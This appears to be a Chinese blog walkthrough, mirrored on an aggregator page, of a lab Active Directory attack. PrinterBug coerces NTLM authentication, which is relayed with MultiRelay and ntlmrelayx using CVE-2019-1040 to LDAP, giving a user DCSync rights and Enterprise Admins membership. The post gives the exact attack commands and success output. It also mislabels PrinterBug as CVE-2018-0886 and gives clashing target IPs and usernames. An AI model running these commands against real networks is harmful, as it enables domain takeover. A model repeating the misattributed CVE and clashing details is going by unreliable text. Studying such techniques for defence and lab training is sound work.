当前位置: 首页 > news >正文

2025-5-14渗透测试:利用Printer Bug ,NTLMv2 Hash Relay(中继攻击),CVE-2019-1040漏洞复现

python3 printerbug.py test.com/test@192.168.186.131 192.168.186.134
sudo python2 MultiRelay.py -t 192.168.186.132 -u ALL

Printer Bug 原理

PrinterBug(CVE-2018-0886)是Windows打印系统服务(Spooler)的一个设计缺陷,允许攻击者强制目标主机(如域控)向指定IP发起NTLM认证请求。其核心原理:

NTLMv2 Relay 攻击原理

NTLM(NT LAN Manager)是Windows的一种认证协议,NTLMv2是其改进版本,但仍存在中继攻击风险。
核心流程

  1. 受害者(Client)向攻击者控制的服务器发起认证请求(如SMB、HTTP、LDAP等)。
  2. 攻击者截获NTLMv2 Hash(Challenge-Response),并将其**中继(Relay)**到另一台目标服务器。
  3. 目标服务器验证Hash,若验证通过,攻击者获得该服务器的访问权限。

关键条件

  • 目标服务未启用SMB签名(默认情况下,Windows域控的SMB签名是强制开启的,但普通服务器可能关闭)。
  • 攻击者能诱骗受害者向自己发起认证(如通过钓鱼、LLMNR/NBT-NS投毒等)。

利用工具

Responder + MultiRelay
  • Responder:监听网络请求,伪造服务(如SMB、HTTP),诱骗受害者发送NTLMv2 Hash。
  • MultiRelay.py:将捕获的Hash中继到目标服务器。
  • 利用PrinterBug.py触发NTLM认证


CVE-2019-1040漏洞

  • 漏洞编号:CVE-2019-1040
  • 影响范围:Windows系统(未安装2019年6月补丁的版本)
  • 核心利用点
    1. 移除NTLM消息中的MIC字段,绕过完整性校验。
    2. 绕过NTLM签名要求,即使目标服务强制签名仍可中继认证。

python3 ntlmrelayx.py --remove-mic --escalate-user test -t ldap://192.168.186.132 -smb2support

 

攻击流程
  • 通过ntlmrelayx.py监听SMB服务,捕获来自TEST/DESKTOP-RRB6A09$的NTLM认证请求。
  • 将认证中继到目标LDAP服务器(ldap://192.168.186.131),成功以DESKTOP-RRB6A09$机器账户身份通过验证。
  • 利用LDAP协议修改域权限,为普通用户test授予 DCSync权限Replication-Get-Changes-All),并添加到 Enterprise Admins 组。
 成功标志
[*] Success! User test now has Replication-Get-Changes-All privileges on the domain
[*] Adding user: testtesttest to group Enterprise Admins result: OK

http://www.xdnf.cn/news/439471.html

相关文章:

  • SparkSQL-数据提取和保存
  • 基于网关实现不同网段S7-1200 CPU的通信方法
  • vue2+ThinkPHP5实现简单大文件切片上传
  • 集成 ONLYOFFICE 与 AI 插件,为您的服务带来智能文档编辑器
  • 化工单元操作试验装置系列产品JG-SX211计算机过程控制板框过滤操作实训装置
  • 【vim】--- vim 插件说明 超详细持续更新中
  • Kafka进阶指南:从原理到实战
  • kafka connect 大概了解
  • 新能源汽车三电质量护盾:蓝光三维扫描技术显身手
  • 力扣每日一题之移动零
  • HTTP 连接复用机制详解
  • egpo进行train_egpo训练时,keyvalueError:“replay_sequence_length“
  • GoogleTest:GMock2 EXPECT_CALL
  • 数据结构基础排序算法
  • 【MySQL 基础篇】深入解析MySQL逻辑架构与查询执行流程
  • 【Ansys 2023 R2 Icepak】热管模型
  • 武汉科技大学人工智能与演化计算实验室许志伟课题组参加2025中国膜计算论坛
  • 【PostgreSQL数据分析实战:从数据清洗到可视化全流程】附录-B. 错误代码与解决方案
  • 论文阅读笔记——双流网络
  • 从阿里SDK学习请求-响应模式
  • 【Python】抽象基类ABC
  • [论文阅读]Formalizing and Benchmarking Prompt Injection Attacks and Defenses
  • 构建现代化WPF应用:数据驱动开发与高级特性解析
  • LeetCode 热题 100 230. 二叉搜索树中第 K 小的元素
  • 多模态论文笔记——NaViT
  • 2005-2022年各省绿色信贷水平测算数据(含原始数据+计算过程+计算结果)
  • 《AI大模型应知应会100篇》第61篇:FastAPI搭建大模型API服务
  • Vue3 区分开发环境与生产环境
  • PostgreSQL常用DML操作的锁类型归纳
  • 搜索二维矩阵 II